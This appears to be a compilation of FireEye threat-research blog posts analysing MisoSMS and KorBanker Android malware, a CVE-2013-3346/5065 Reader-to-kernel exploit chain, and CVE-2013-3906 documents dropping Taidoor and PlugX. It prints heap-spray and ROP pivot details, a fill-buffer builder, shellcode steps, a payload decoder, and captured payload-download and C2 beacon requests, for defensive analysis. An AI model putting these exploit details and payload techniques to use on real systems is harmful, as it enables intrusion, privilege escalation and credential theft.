                          if(BaseSystem.android_id.equals("")) {
                              // (elided)
                          }
                          MisoData.request_data.data_head.android_id = BaseSystem.android_id;
                          MisoData.request_data.data_head.phone_model = BaseSystem.phone_model;
                          MisoData.request_data.data_head.os_version = BaseSystem.os_version;
                          MisoData.request_data.data_head.phone_num = BaseSystem.phone_num;
                          byte[] v0 = MisoService.jndkAction(NetDataCover.RequestToBytes(MisoData.request_data));
                          if(v0 != null) {
                              MisoData.replay_data = NetDataCover.BytesToReplay(v0);
                          }
                      }
                      if(MisoData.replay_data.data_head.sms_task_rec_phone_count != 0) {
                          // (elided)
                      }
                      SystemClock.sleep(((long)(MisoData.replay_data.data_head.reconn_deply * 100)));
                  }
              }
          }.start();
      }

      The value for MisoData.replay_data.data_head.reconn_deply is set to 300, putting the service to sleep for 30 seconds between retries.
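
The arithmetic behind that 30-second figure is simply the CnC-supplied value multiplied by 100 milliseconds, as in the decompiled sleep call:

```java
public class ReconnDelay {
    // Mirrors SystemClock.sleep((long)(reconn_deply * 100)) from the excerpt.
    static long sleepMillis(short reconnDeply) {
        return (long) (reconnDeply * 100);
    }

    public static void main(String[] args) {
        System.out.println(sleepMillis((short) 300)); // 30000 ms = 30 s
    }
}
```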


      BaseService

      BaseService ensures that RollService and MisoService do not stop running. The BaseBootReceiver class also uses BaseService to restart the other two services if the device reboots.

      BaseService.this.startService(new Intent(BaseService.this.context, RollService.class));

      BaseService.this.startService(new Intent(BaseService.this.context, MisoService.class));


      MisoSMS is one of the largest mobile botnets that leverages modern botnet techniques and infrastructure. This discovery, coupled with the other discoveries from FireEye, highlights the importance of mobile security and the quickly changing threat landscape.

      CVE-2013-3346/5065 Technical Analysis

      In our last post, we warned of a new Windows local privilege escalation vulnerability being used in the wild. We noted that the Windows bug (CVE-2013-5065) was exploited in conjunction with a patched Adobe Reader bug (CVE-2013-3346) to evade the Reader sandbox. CVE-2013-3346 was exploited to execute the attacker’s code in the sandbox-restricted Reader process, where CVE-2013-5065 was exploited to execute more malicious code in the Windows kernel.

      In this post, we aim to describe the in-the-wild malware sample, from initial setup to unrestricted code execution.

      CVE-2013-3346: Adobe Reader ToolButton Use-After-Free

      CVE-2013-3346 was privately reported to ZDI by Soroush Dalili, apparently in late 2012. We could find no public description of the vulnerability. Our conclusion that the sample from the wild exploits CVE-2013-3346 is based upon the following premises:

      1. The sample contains JavaScript that triggers a use-after-free condition with ToolButton objects.
      2. CVE-2013-3346 is a use-after-free condition with ToolButton objects.
      3. The Adobe Reader patch that addresses CVE-2013-3346 also stops the in-the-wild exploit.

      CVE-2013-3346 Exploitation: Technical Analysis

        The bug is a classic use-after-free vulnerability: within JavaScript, nesting ToolButton objects and freeing the parent from within child callbacks results in a stale reference to the freed parent. More specifically, the bug can be triggered as follows:

        1. Make a parent ToolButton with a callback CB.
        2. Within the callback CB, make a child ToolButton with a callback CB2.
        3. Within the callback CB2, free the parent ToolButton.

        The sample from the wild exploits the bug entirely from JavaScript. The code sets up the heap, builds ROP chains, builds shellcode, and triggers the actual bug. The only component of the attack that wasn’t implemented in JavaScript is the last-stage payload (executable file).

          The exploit script first chooses some parameters based upon the major version of Reader (version 9, 10, or 11):

          • ROP Chain
          • Size of corrupted object
          • Address of pivot in heap spray
• Address of a NOP gadget

          Next, it sprays the heap with the return-oriented programming (ROP) attack chain and shellcode, triggers the freeing, and fills the hole left by the freed object with a pivot to the ROP attack chain.

          The freed hole is filled with the following:

          000: 41414141 ;; Padding

          01c: 0c0c08e4 ;; Address of pivot in heap spray

          020: 41414141 ;; More padding

          37c: 41414141 ;; The size of the object is a version-specific parameter
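The fill buffer described above can be reconstructed in Python; this is an illustrative sketch based only on the offsets listed (the real exploit builds the buffer in JavaScript):

```python
import struct

PIVOT_PTR = 0x0c0c08e4   # heap-spray address written at offset 0x1c
OBJ_SIZE  = 0x37c        # version-specific size of the corrupted object

def build_fill_buffer():
    """Build the buffer that replaces the freed ToolButton object."""
    buf = bytearray(b"\x41" * OBJ_SIZE)            # 0x41 ('A') padding
    buf[0x1c:0x20] = struct.pack("<I", PIVOT_PTR)  # pointer read by the vtable call
    return bytes(buf)

fill = build_fill_buffer()
```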

          The pivot can be observed with the following windbg breakpoint:

          bp 604d7699 "!heap -p -a @esi; dd @esi-1c; .if (@eax != 0x0c0c08e4) { gc; }"

The following windbg output shows the object before corruption:

              address 02668024 found in

          _HEAP @ 1270000

          HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

          02668000 0071 0000 [01] 02668008 0037c - (busy)

          02668008 01278420 00000000 00000002 02a24008

          02668018 02763548 00000360 02668008 60a917d4

          02668028 00000000 60a917a8 00000000 00000000

          02668038 60a91778 00000000 60a91768 0133ded4

          02668048 00000001 01d9eb60 00000001 02668024

          02668058 00000000 00000000 00000000 00000000

          02668068 00000000 00000000 00000000 00000000

          02668078 02f32e5c 00000002 00000004 00000000

After corruption, the freed hole has been filled with padding, with the heap-spray address placed at offset 0x1c into the object:

              address 02668024 found in

          _HEAP @ 1270000

          HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

          02668000 0071 0000 [01] 02668008 0037c - (busy)

          02668008 41414141 41414141 41414141 41414141

          02668018 41414141 41414141 41414141 0c0c08e4

          02668028 41414141 41414141 41414141 41414141

          02668038 41414141 41414141 41414141 41414141

          02668048 41414141 41414141 41414141 41414141

          02668058 41414141 41414141 41414141 41414141

          02668068 41414141 41414141 41414141 41414141

          02668078 41414141 41414141 41414141 41414141

The heap-spray address points to the address of the pivot minus 0x328, because the following instruction calls through the address plus 0x328:

          604d768d 8b06            mov     eax,dword ptr [esi]

          604d7699 ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=90e0824a

          1:009> dd @eax+0x328

          0c0c0c0c 4a82e090 4a82007d 4a850038 4a8246d5

          0c0c0c1c ffffffff 00000000 00000040 00000000

          0c0c0c2c 00001000 00000000 4a805016 4a84420c

          0c0c0c3c 4a814241 4a82007d 4a826015 4a850030

          0c0c0c4c 4a84b49d 4a826015 4a8246d5 4a814197

          0c0c0c5c 00000026 00000000 00000000 00000000

          0c0c0c6c 4a814013 4a84e036 4a82a8df 41414141

          0c0c0c7c 00000400 41414141 4a818b31 4a814197
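A quick sanity check on the offsets: the dword planted at object+0x1c, plus the 0x328 displacement in the call instruction, lands exactly on the sprayed slot holding the pivot pointer:

```python
obj_value = 0x0c0c08e4   # dword at object+0x1c, loaded into eax via [esi]
call_disp = 0x328        # displacement in "call dword ptr [eax+328h]"
pivot_slot = obj_value + call_disp

assert pivot_slot == 0x0c0c0c0c  # the classic heap-spray address
```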

          And the pivot is set at 4a82e090, which sets the stack pointer to the attacker’s ROP chain as follows:

          1:009> u 4a82e090


          4a82e090 50 push eax

          4a82e091 5c pop esp

          4a82e092 c3 ret

          The exploit plays out in stages.

          Stage 1: ROP

          The exploit uses ROP to circumvent data execution prevention (DEP) features. All of the gadgets, including the pivot, are from icucnv40.dll. The ROP chain is one of three chains chosen by Reader major version (9, 10, or 11). The attacker uses a heapspray to place the pivot, ROP chain, and shellcode at predictable addresses. The ROP chain:

          1. Maps RWX memory with kernel32!CreateFileMappingA and kernel32!MapViewOfFile
          2. Copies Stage 2 shellcode to RWX memory with MSVCR90!memcpy
          3. Executes the shellcode
Stage 2: Shellcode

            The shellcode exploits CVE-2013-5065 to set the privilege level of the Reader process to that of system, and then decodes an executable from the PDF, writes it to the temporary directory, and executes it.

            Shellcode Technical Analysis

            First, the shellcode copies a Stage 2.1 shellcode stub to RWX memory mapped to the null page.

            0af: ntdll!NtAllocateVirtualMemory RWX memory @ null page

            180: Copy privileged shellcode to RWX memory

            183: Add current process ID to privileged shellcode

            Next, the shellcode exploits CVE-2013-5065 to execute the Stage 2.1 shellcode in the context of the Windows kernel as follows:

            19b: Trigger CVE-2013-5065 to execute stage 2.1 from kernel




            303: Stage 2.1 shellcode begins

            3d6: PsLookupProcessByProcessId to get EPROCESS structure for Reader process

            3e5: PsLookupProcessByProcessId to get EPROCESS structure for system

            3f9: Copy EPROCESS.Token from system to Reader

            3fd: Zero the EPROCESS.Job field

            This process is documented well in a paper (PDF download) from security researcher Ronnie Johndas.

After returning from the kernel, the shellcode iterates over potential handle values, looking for the encoded PE file embedded within the PDF as follows:

            ...: Find open handle to the PDF file by iterating over potential

            ...: handle values (0, 4, 8, ...) and testing that:

            212: The handle is open and to a file with kernel32!SetFilePointer

            21e: The file size is less than 0x1000 bytes with kernel32!GetFileSize

            239: It begins with "%PDF" with kernel32!ReadFile

            257: Allocate memory with kernel32!VirtualAlloc and

            262: Read the PDF into memory with kernel32!ReadFile

            26f: Find the encoded PE file by searching for 0xa0909f2 with kernel32!ReadFile
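The final marker scan can be sketched in Python; treating 0x0a0909f2 as a little-endian dword in the file stream is an assumption for illustration:

```python
import struct

MARKER = struct.pack("<I", 0x0a0909f2)  # assumed little-endian dword marker

def find_encoded_pe(pdf_bytes: bytes) -> int:
    """Return the offset just past the marker, or -1 if it is absent."""
    off = pdf_bytes.find(MARKER)
    return -1 if off < 0 else off + len(MARKER)

# Toy buffer: PDF header, marker, then the "encoded PE"
sample = b"%PDF-1.5 ..." + MARKER + b"\xde\xad\xbe\xef"
```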

            The shellcode decodes the PE file using the following algorithm and writes it to disk:

def to_u8(i):
    if i >= 0: return i
    return 0xff + i + 1

buf = buf[4:]                 # Skip the first four bytes
out = ""
for i in xrange(len(buf)):
    c = ord(buf[i])
    c -= (i ** 2) & 0xff      # Subtract index^2 from character
    c = to_u8(c)              # Wrap to an unsigned 8-bit value
    c ^= 0xf3                 # XOR character with 0xf3
    out += chr(c)             # out accumulates the decoded PE file



28f: Decode the PE file (algorithm supplied above)

            2ad: Get the path to the temporary directory with kernel32!GetTempPathA

            2bb: Request a temporary file with kernel32!GetTempFileNameA

            2dd: Open the temporary file with kernel32!CreateFileA

            2f0: Write decoded PE to temporary file with kernel32!WriteFile

            2f4: Close the file

            The shellcode executes the decoded PE file as follows:

            2fe:	kernel32!WinExec "cmd /c "


            JavaScript Obfuscation & Evasions

JavaScript analysis engines often emulate suspect code to de-obfuscate it for further analysis. If the JavaScript emulation environment doesn’t match the real environment (that is, JavaScript in Adobe Reader during exploitation), then the attacker can detect a discrepancy and abort the exploitation to prevent detection. The exploit implementation begins with the following instruction, which appears to be emulation-evasion code that causes the script to crash within emulation systems such as jsunpack:

            if( >= 1)


The attacker used a public tool (with "global variable name" = "Q") to obfuscate the exploit. It works by building a dictionary that maps wonky names to hex digits as follows:

            // Q={___:"0", $$$$:"f", __$:"1", $_$_:"a", _$_:"2", $_$$:"b", $$_$:"d", _$$:"3", $$$_:"e", $__:"4", $_$:"5", $$__:"c", $$_:"6", $$$:"7", $___:"8", $__$:"9" };



            Then, using the dictionary and other built-in strings, it builds more JavaScript code as follows:

            // Q.$_ = "constructor"

            Q.$_= /*c*/(Q.$_=Q+"")[Q.$_$]+ // Q.$_ = the string "[object Object]"

            /*o*/(Q._$=Q.$_[Q.__$])+ // by indexing into Q.$_

            /*n*/(Q.$$=(Q.$+"")[Q.__$])+ // by indexing into the string "undefined"

            /*s*/((!Q)+"")[Q._$$]+ // and so on...








            It goes on to acquire a reference to the Function object by accessing "".constructor.constructor and calling the exploit code by Function("the deobfuscated script")(). The end result is an entirely indigestible script. Yuck!

            The "".constructor.constructor trick is clever. While shortening the obfuscated script, it gets around Function hooks implemented within the JavaScript environment (that is, by “Function = _Function_hook;”).

            Sandbox Bypass

            Although the Adobe Reader sandbox for Windows XP has fewer restrictions compared to sandboxes in Windows 7, 8, and 8.1, it still has restricted tokens, limited Job settings, broker processes, and protection policies.

            The difference is that the Windows integrity mechanism is not available in Windows XP. So the sandboxed process does not run in low-integrity mode.

But the attacker still must bypass the sandbox protection on Windows XP to run privileged malicious code. As the following screenshot shows, the sandboxed process is not allowed to create a file on the currently logged-in user’s desktop:


            Figure 1: Sandboxing protection in Windows XP

            In this case, the attacker exploits the NDProxy.sys vulnerability to obtain a higher privilege and bypass the Adobe sandbox protections.


            For this kernel exploit (CVE-2013-5065), the attacker uses Windows’ NtAllocateVirtualMemory() routine to map shellcode to the null page. So enabling null-page protection in Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) prevents exploitation. You can also follow the workaround posted on Microsoft’s TechNet blog or upgrade to a newer version of Windows (Vista, 7, 8, or 8.1).

            Finally, updating Adobe Reader stops the in-the-wild malware sample by patching the CVE-2013-3346 vulnerability.


The combined CVE-2013-3346/CVE-2013-5065 exploit chain works as follows:

            1. The ROP chain and shellcode are sprayed to memory from JavaScript
            2. CVE-2013-3346 UAF is triggered from JavaScript
            3. The freed ToolButton object is overwritten with the address of the pivot in JavaScript
            4. The pivot is executed, and the stack pointer is set to the ROP sled
            5. The ROP allocates shellcode in RWX memory and jumps to it
            6. The shellcode stub (Stage 2.1) is copied to the null page (RWX)
7. The shellcode triggers CVE-2013-5065 to call Stage 2.1 from the kernel
            8. Stage 2.1 elevates privilege of the Adobe Reader process
            9. Back to usermode, the PE payload is decoded from the PDF stream to a temp directory
            10. The PE payload executes
MS Windows Local Privilege Escalation Zero-Day in The Wild

              FireEye Labs has identified a new Windows local privilege escalation vulnerability in the wild. The vulnerability cannot be used for remote code execution but could allow a standard user account to execute code in the kernel. Currently, the exploit appears to only work in Windows XP.

              This local privilege escalation vulnerability is used in-the-wild in conjunction with an Adobe Reader exploit that appears to target a patched vulnerability. The exploit targets Adobe Reader 9.5.4, 10.1.6, 11.0.02 and prior on Windows XP SP3. Those running the latest versions of Adobe Reader should not be affected by this exploit.

              Post exploitation, the shellcode decodes a PE payload from the PDF, drops it in the temporary directory, and executes it.


              The following actions will protect users from the in-the-wild PDF exploit:

              1) Upgrade to the latest Adobe Reader

              2) Upgrade to Microsoft Windows 7 or higher

This post was intended to serve as a warning to the general public. We are collaborating with the Microsoft Security team on research activities. Microsoft assigned CVE-2013-5065 to this issue.

              We will continue to update this blog as new information about this threat is found.

              [Update]: Microsoft released security advisory 2914486 on this issue.

              Dissecting Android KorBanker

              FireEye recently identified a malicious mobile application that installs a fake banking application capable of stealing user credentials. The top-level app acts as a bogus Google Play application, falsely assuring the user that it is benign.

              FireEye Mobile Threat Prevention platform detects this application as Android.KorBanker. This blog post details both the top-level installer as well as the fake banking application embedded inside the top-level app.

              The app targets the following banks, all of which are based in Korea.

              • Hana Bank
              • IBK One
              • KB Kookmin Bank
              • NH Bank
              • Woori Bank
              • Shinhan Bank

              Once installed, the top-level application presents itself as a Google Play application. It also asks the user for permission to activate itself as a device administrator, which gives KorBanker ultimate control over the device and helps the app stay hidden from the app menu.


              The user sees the messages in Figure 1 and Figure 2.


              The message in Figure 2 translates to: “Notification installation file is corrupt error has occurred. Sure you want to delete the corrupted files?”

When the user taps the “Yes” button, KorBanker hides itself from the user by calling the following Android API:

              getPackageManager().setComponentEnabledSetting(new ComponentName("", ""), 2, 1)

The arguments “2” and “1” passed to this function are explained below.

The 2 argument is the value of the COMPONENT_ENABLED_STATE_DISABLED flag, which disables the component and removes it from the app menu.

The 1 argument is the value of the DONT_KILL_APP flag, which indicates that the app should not be killed and should continue running in the background.

              After installation, the app checks whether any of the six targeted banking applications have been installed. If it finds any, it deletes the legitimate banking application and silently replaces it with a fake version. The fake versions of the banking applications are embedded in the “assets” directory of the top-level APK.

              Initial registration protocol

              The top-level APK and the embedded fake banking app register themselves with their respective command-and-control (CnC) servers. The following section explains the registration process.

              Top-level app

              The top-level app registers itself by sending the device ID of the phone to the remote CnC server packed in a JavaScript Object Notation (JSON) object. The data packet excerpt is shown in Figure 3. This is the first packet that is sent out once the app is installed on the device.


              Figure 3: KorBanker data packet during registration

The packet capture shown in Figure 3 shows the structure of the registration message. The bytes highlighted in red indicate the CnC message code of 0x07 (decimal 7), which translates to the string addUserReq.

Outlined in yellow is the length indicator, 0x71 (113 bytes), followed by the JSON object containing the Device ID and the phone number of the device. The values for callSt and smsSt are statically set to 21 and 11, respectively.

              The response bytes shown in black containing 0x04 and 0x01 map to the command addUserAck. They are sent by the server to acknowledge the receipt of the previously sent addUserReq. Code inside the application invokes various functions as it receives commands. These functions may exist for future updates of the application.
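A rough Python sketch of the registration message described above. The one-byte code/length framing and the JSON field names (deviceId, telNum) are assumptions for illustration; only the 0x07 code and the callSt/smsSt values come from the capture:

```python
import json
import struct

def build_add_user_req(device_id: str, phone: str) -> bytes:
    """Sketch of an addUserReq packet: code byte, length byte, JSON body."""
    body = json.dumps({"deviceId": device_id, "telNum": phone,
                       "callSt": 21, "smsSt": 11}).encode()
    # Hypothetical framing: message code followed by a one-byte body length.
    return struct.pack("BB", 0x07, len(body)) + body

pkt = build_add_user_req("354957031234567", "01012345678")
```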


              Figure 4: KorBanker code for sending incoming messages to CnC server

Once the installation of the app has been registered, the app waits for incoming messages on the phone, possibly looking for access codes that arrive as part of two-factor authentication methods for one of the six targeted banks. All incoming messages to the phone are intercepted and sent to the CnC server on port 8888 as shown in Figure 4.

The bytes highlighted in red after the response show the message code of 0x08 (decimal 8), which translates to the command addSmsReq. This is followed by the size of the message. The Device ID is sent at the end of the data packet, along with the timestamp, to identify the device on which the message was seen. The malware also suppresses the SMS notification from the user and deletes the message from the device.

              The remote CnC infrastructure is based on numeric codes. These codes are stored in a data structure in the app. All incoming messages and responses from the CnC server arrive in numeric codes and get translated into corresponding strings, which in turn drive the app to perform different tasks.

              Table 1 shows the CnC commands supported by the top-level app. All the commands ending with “Req” correspond to the infected client requests made to the CnC server. All the commands ending with “Ack” indicate acknowledgements of the received commands.
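The numeric command codes named in the post can be collected into a dispatch table; the table below is an illustrative reconstruction, not the app's actual data structure:

```python
# Codes observed in the captures above; all other codes are unknown to us.
CNC_COMMANDS = {
    0x07: "addUserReq",  # client registers device ID / phone number
    0x04: "addUserAck",  # server acknowledges registration
    0x08: "addSmsReq",   # client forwards an intercepted SMS
}

def decode_command(code: int) -> str:
    """Translate a numeric CnC code into its command string."""
    return CNC_COMMANDS.get(code, "unknown")
```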


              Fake banking app 

Once installed, the fake banking app registers with a CnC server at a different IP address by sending the HTTP request shown below.


              Figure 5: Data capture showing the installation of the fake banking app 

Once the phone is registered, the user is presented with the fake login page of the banking app, which prompts the user for banking account credentials. All of these credentials are stored internally in a JSON object.

The user is then prompted for an SCARD code and 35-digit combination, which is recorded into the JSON object and sent out as follows:

              { "renzheng" : "1234",

              "fenli" : "1234",

              "datetime" : "2013-08-12 12:32:32",


              "bankinid": '1234',

              "jumin": '1234',

              "banknum" : '1234',

              "banknumpw" : '1234',

              "paypw" : 'test',

              "scard" : "1234567890",

              "sn1" : "1234",

              "sn2" : "1234",

              "sn3" : "1234",



              "sn34" : "1234",

              "sn35" : "1234"


              The response received is as follows:

              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

              Connection: close

              Content-Type: text/html

              Date: Fri, 22 Nov 2013 02:05:00 GMT

              Expires: Thu, 19 Nov 1981 08:52:00 GMT



This malware sample takes extra measures to obtain banking credentials. With the increased usage of mobile devices, and with the liberal permissions granted to apps that appear benign, we are now at an increased risk of monetary losses on the mobile front. Mobile banking is not completely devoid of adversaries. KorBanker is a vivid reminder of just how dangerous apps from untrusted sources can be.

              Monitoring Vulnaggressive Apps on Google Play

              Vulnaggressive Characteristics in Mobile Apps and Libraries

              FireEye mobile security researchers have discovered a rapidly-growing class of mobile threats represented by popular ad libraries affecting apps with billions of downloads. These ad libraries are aggressive at collecting sensitive data and able to perform dangerous operations such as downloading and running new code on demand. They are also plagued with various classes of vulnerabilities that enable attackers to turn their aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. We have published some of our findings in our two recent blogs about these threats: “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions” and “Update: Ad Vulna Continues”.

              As we reported in our earlier blog “Update: Ad Vulna Continues”, we have observed that some vulnaggressive apps have been removed from Google Play, and some app developers have upgraded their apps to a more secure version either by removing the vulnaggressive libraries entirely or by upgrading the relevant libraries to a more secure version which address the security issues. However, many app developers are still not aware of these security issues and have not taken such needed steps. We need to make a community effort to help app developers and library vendors to be more aware of these security issues and address them in a timely fashion.

To aid this community effort, we present data illustrating the changes over time as vulnaggressive apps are upgraded to a more secure version or removed from Google Play after our notification. We summarize our observations below, although we do not have specific information about the reasons behind the changes we are reporting.

              We currently only show the chart for one such vulnaggressive library, AppLovin (previously referred to by us as Ad Vulna for anonymity). We will add the charts for other vulnaggressive libraries as we complete our notification/disclosure process and the corresponding libraries make available new versions that fix the issues.

              The Chart of Apps Affected by AppLovin

              AppLovin (Vulna)’s vulnerable versions include 3.x, 4.x and 5.0.x. AppLovin 5.1 fixed most of the reported security issues. We urge app developers to upgrade AppLovin to the latest version and ask their users to update their apps as soon as the newer versions are available.

              The figure below illustrates the change over time of the status of vulnerable apps affected by AppLovin on Google Play. In particular, we collect and depict the statistics of apps that we have observed on Google Play with at least 100k downloads and with at least one version containing the vulnerable versions of AppLovin starting September 20. Over time, a vulnerable app may be removed by Google Play (which we call “removed apps”, represented in gray), have a new version available on Google Play that addresses the security issues either by removing AppLovin entirely or by upgrading the embedded AppLovin to 5.1 or above (which we call “upgradable apps”, represented in green), or remain vulnerable (which we call “vulnerable apps”, represented in red), as shown in the legend in the chart.

              Please note that we started collecting the data of app removal from Google Play on October 20, 2013. Thus, any relevant app removal between September 20 and October 20 will be counted and shown on October 20. Also, for each app included in the chart, Google Play shows a range of its number of downloads, e.g., between 1M and 5M. We use the lower end of the range in our download count so the statistics we show are conservative estimates.
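The conservative counting rule can be made concrete with a toy sketch (the app names and ranges are hypothetical; only the lower-end rule comes from the text):

```python
# Google Play reports download counts as ranges; we take the lower end
# of each range so the totals are conservative estimates.
play_ranges = {
    "app_a": (1_000_000, 5_000_000),
    "app_b": (100_000, 500_000),
    "app_c": (500_000, 1_000_000),
}

conservative_total = sum(low for low, _high in play_ranges.values())
```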


              We are glad to see that over time, many vulnerable apps have been either removed from Google Play or have more secure versions available on Google Play. However, apps with hundreds of millions of downloads in total still remain vulnerable. In addition, note that while removing vulnaggressive apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable since they are not automatically removed from the devices. Furthermore, because many users do not update their downloaded apps often and older versions of Android do not auto-update apps, even after the new, more secure version of a vulnerable app is available on Google Play, millions of users of these apps will remain vulnerable until they update to the new versions of these apps on their devices. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

              Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906

Last week, we blogged about a zero-day vulnerability (CVE-2013-3906) that was being used by at least two different threat groups. Although it was the same exploit, the two groups deployed it differently and dropped very different payloads. One group, known as Hangover, engages in targeted attacks, usually against targets in Pakistan. The second group, known as Arx, used the exploit to spread the Citadel Trojan, and we have found that they are also using the Napolar (aka Solar) malware. [1]

              Looking at the time of the first known use of the exploit, we noted that the Arx group appeared to have had access to this exploit prior to the Hangover group. Subsequent research by Kaspersky has found that this exploit was used in July 2013 to spread a cross-platform malware known as Janicab. Interestingly, the Janicab samples have exactly the same CreateDate and ModifyDate as the Arx samples. However, the ZipModifyDate is different. They also contain the same embedded TIFF file (aa6d23cd23b98be964c992a1b048df6f).

              While the Janicab activity dates the use of CVE-2013-3906 to July, other groups, including those associated with advanced persistent threat (APT) activity, have now begun to use this exploit as well. We have found that CVE-2013-3906 is now being used to drop Taidoor and PlugX (which we call Backdoor.APT.Kaba). Interestingly, the version of the exploit used contains elements that are consistent with the Hangover implementation. Both the Taidoor and PlugX samples have EXIF data that is consistent with a Hangover sample. In addition, the samples share the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1).


              The Taidoor malware has been used in numerous targeted attacks that typically affect Taiwan-related entities. We recently blogged about modifications that have been made to the Taidoor malware. This new version of Taidoor is being dropped by malicious documents using the CVE-2013-3906 exploit. The malware is being distributed via an email purporting to be from a Taiwanese government email address.


              The Taidoor sample we analyzed (6003b22d22af86026afe62c39316b9e0) has the same CreateDate and ModifyDate as the Hangover samples we analyzed. It also shares an exact ZipModifyDate with one of the Hangover samples. (There are variations in the ZipModifyDate among the Hangover samples).

              • CreateDate                : 2013:10:03 22:46:00Z
              • ModifyDate                : 2013:10:03 23:17:00Z
              • ZipModifyDate           : 2013:10:17 14:21:23

              It also contains other EXIF data that matches a Hangover sample (and the PlugX sample discussed below):

              • App Version                     : 12.0000
              • Creator                            : Win7
              • Last Modified By              : Win7
              • Revision Number             : 1

              The sample also contains the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1). This indicates that they were probably built with the same weaponizer tool.
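The EXIF overlap that ties these droppers together can be expressed as a simple grouping key. The metadata below is transcribed from the values above; the clustering helper itself is just an illustration:

```python
from collections import defaultdict

# (CreateDate, ModifyDate, embedded TIFF MD5) per malicious document
doc_metadata = {
    "6003b22d22af86026afe62c39316b9e0":  # Taidoor dropper
        ("2013:10:03 22:46:00Z", "2013:10:03 23:17:00Z",
         "7dd89c99ed7cec0ebc4afa8cd010f1f1"),
    "80c8ce1fd7622391cac892be4dbec56b":  # PlugX dropper
        ("2013:10:03 22:46:00Z", "2013:10:03 23:17:00Z",
         "7dd89c99ed7cec0ebc4afa8cd010f1f1"),
}

clusters = defaultdict(list)
for md5, key in doc_metadata.items():
    clusters[key].append(md5)  # identical keys suggest a shared weaponizer
```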

After the exploit is triggered, a connection is made to retrieve an EXE from a web server:

              GET /o.exe HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

This EXE is Taidoor, and it is configured to beacon to two command and control (CnC) servers:

              GET /user.jsp?ij=oumded191138F9744C HTTP/1.1

              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


              Connection: Keep-Alive

              Cache-Control: no-cache

              GET /parse.jsp?js=iwmnxw191138F9744C HTTP/1.1

              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


              Connection: Keep-Alive

              Cache-Control: no-cache

              We have located an additional sample (5c8d7d4dd6cc8e3b0bd6587221c52102) that also retrieves Taidoor:

              GET /suv/update.exe HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

This sample beacons to the following command and control server:

              GET /parse.jsp?ne=vyhavf191138F9744C HTTP/1.1

              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


              Connection: Keep-Alive

              Cache-Control: no-cache

              PlugX (Kaba)

              The PlugX malware (aka Backdoor.APT.Kaba) has been used in a variety of targeted attacks. We located a malicious document (80c8ce1fd7622391cac892be4dbec56b) that exploits CVE-2013-3906. This sample contains the same CreateDate and ModifyDate and shares a common ZipModifyDate with both the Taidoor samples and one of the Hangover samples.

              • CreateDate                : 2013:10:03 22:46:00Z
              • ModifyDate                : 2013:10:03 23:17:00Z
              • ZipModifyDate           : 2013:10:17 14:21:23

After exploitation, a connection is made to download a PlugX executable:

              GET /css/css.exe HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


The malware (423eaeff2a4576365343e6dc35d22042) begins to beacon to two domains, which both resolve to the same IP address. The callback of the PlugX samples is:

              POST /8A8DAEE657205D651405D7CD HTTP/1.1

              Accept: */*

              FZLK1: 0

              FZLK2: 0

              FZLK3: 61456

              FZLK4: 1

              User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)


              Content-Length: 0

              Connection: Keep-Alive

              Cache-Control: no-cache


              An increasing number of threat groups now have access to CVE-2013-3906. These threat groups include those that use the Taidoor and PlugX malware families to conduct targeted attacks. We expect this exploit to continue to proliferate among threat groups engaged in APT activity.


              1.  The MD5 hashes for Arx group samples that dropped Napolar are:  5e4b83fd11050075a2d4913e6d81e553  and f6c788916cf6fafa202494658e0fe4ae. The CnC server was: /

              Supply Chain Analysis: From Quartermaster to Sunshop

Today, we released a new report from FireEye Labs entitled Supply Chain Analysis: From Quartermaster to Sunshop.

              The report details how many seemingly unrelated cyber attacks may, in fact, be part of a broader offensive fueled by a shared development and logistics infrastructure — a finding that suggests some targets are facing a more organized menace than they realize. Our research points to centralized planning and development by one or more advanced persistent threat (APT) actors. Malware clearly remains a desired cyber weapon of choice. Streamlining development makes financial sense for attackers, so the findings may imply a bigger trend towards industrialization that achieves an economy of scale.

              Download the Malware Supply Report

              Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method

